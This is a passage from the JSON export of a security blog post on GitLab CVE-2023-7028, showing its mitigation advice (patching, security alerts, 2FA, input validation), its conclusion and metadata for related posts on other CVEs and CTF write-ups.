aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"411\" data-attachment-id=\"419\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/image-4-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?fit=2136%2C857&amp;ssl=1\" data-orig-size=\"2136,857\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-4\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?fit=1024%2C411&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=1024%2C411&#038;ssl=1\" alt=\"\" class=\"wp-image-419\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=1024%2C411&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=300%2C120&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=768%2C308&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=1536%2C616&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=2048%2C822&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Mitigation Techniques<\/mark><\/h3>\n\n\n\n<p>As part of mitigation, GitLab has officially released the patch. We can see from the&nbsp;<a href=\"https:\/\/gitlab.com\/gitlab-org\/gitlab-foss\/-\/commit\/21f32835ac7ca8c7ef57a93746dac7697341acc0\" target=\"_blank\" rel=\"noreferrer noopener\">source code review<\/a>&nbsp;that additional validation and verification steps have been added to the GitLab source code repository for the email address to curtail the possibility of exploitation in the future.<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/8ccce20ed06ef96ba2ac69dade1f6315.png?ssl=1\" alt=\"GitLab protection shield with logo\"\/><\/figure>\n\n\n\n<div style=\"height:22px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>However, it is of paramount importance to see that non-compliance with secure coding practices leads to disastrous results.<\/p>\n\n\n\n<p>So far, we learned how to perform the attack and how to detect the attack patterns in the logs; let&#8217;s talk about a few mitigation steps that we can take to prevent our servers from being exploited.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Enable&nbsp;<a href=\"https:\/\/about.gitlab.com\/security\/\" target=\"_blank\" rel=\"noreferrer noopener\">GitLab security alerts<\/a>&nbsp;that would allow early awareness of patches.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/f10bf8f2429499a73ecb54cfa59c12f2.PNG?ssl=1\" alt=\"GitLab update security patch modal\"\/><\/figure>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Upgrade GitLab<\/strong>&nbsp;to a patched version.<\/li>\n\n\n\n<li>Enable&nbsp;<strong>two-factor authentication (2FA)<\/strong>&nbsp;for all GitLab accounts, especially administrator accounts.<\/li>\n\n\n\n<li>Follow&nbsp;<strong>secure coding practices<\/strong>, including proper input validation and email address verification.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h3>\n\n\n\n<p>This is it. As GitLab is a widely used platform and this vulnerability is still being exploited in the wild, it is recommended to keep an updated version of GitLab to avoid such vulnerabilities from being exploited<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This blog is based on TryHackMe&#8217;s room on GitLab CVE-2023-7028. Learning Objectives What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management, continuous integration, and collaboration in software development projects. Per the&nbsp;latest stats, the platform ranks first for&nbsp;CI\/CD&nbsp;and DevOps tools, surpassing other vital [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,39,13,12],"tags":[],"class_list":["post-414","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-cve","category-linux","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":625,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/","url_meta":{"origin":414,"position":0},"title":"CVE-2023-33831","author":"ishsome","date":"May 9, 2024","format":false,"excerpt":"This vulnerability allowed remote command execution (RCE) vulnerability in the \/api\/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":584,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/","url_meta":{"origin":414,"position":1},"title":"Moniker Link (CVE-2024-21413)","author":"ishsome","date":"March 3, 2024","format":false,"excerpt":"On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE & credential leak vulnerability with the assigned CVE of CVE-2024-21413 (Moniker Link). Haifei Li of Check Point Research is credited with discovering the vulnerability. The vulnerability bypasses Outlook's security mechanisms when handing a specific type of hyperlink known as a\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":414,"position":2},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":414,"position":3},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]},{"id":382,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/29\/reveal-hidden-files-in-google-storage\/","url_meta":{"origin":414,"position":4},"title":"Reveal Hidden Files in Google Storage","author":"ishsome","date":"January 29, 2024","format":false,"excerpt":"This blog is based on the free lab provided by PwnedLabs. PwnedLabs provides a lot of free labs to practice in the cloud environment on platforms such as AWS, GCP, and Azure. The lab showcases how Cloud storage can be easy to misconfigure and misuse, and there is also a\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-55.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-55.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-55.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-55.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-55.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-55.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":422,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","url_meta":{"origin":414,"position":5},"title":"TryHackMe: Kitty","author":"ishsome","date":"February 5, 2024","format":false,"excerpt":"Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty] \u2514\u2500$ nmap -p22,80 10.10.113.181\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=700%2C400&ssl=1 2x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/414","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=414"}],"version-history":[{"count":1,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/414\/revisions"}],"predecessor-version":[{"id":420,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/414\/revisions\/420"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=414"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=414"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=414"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}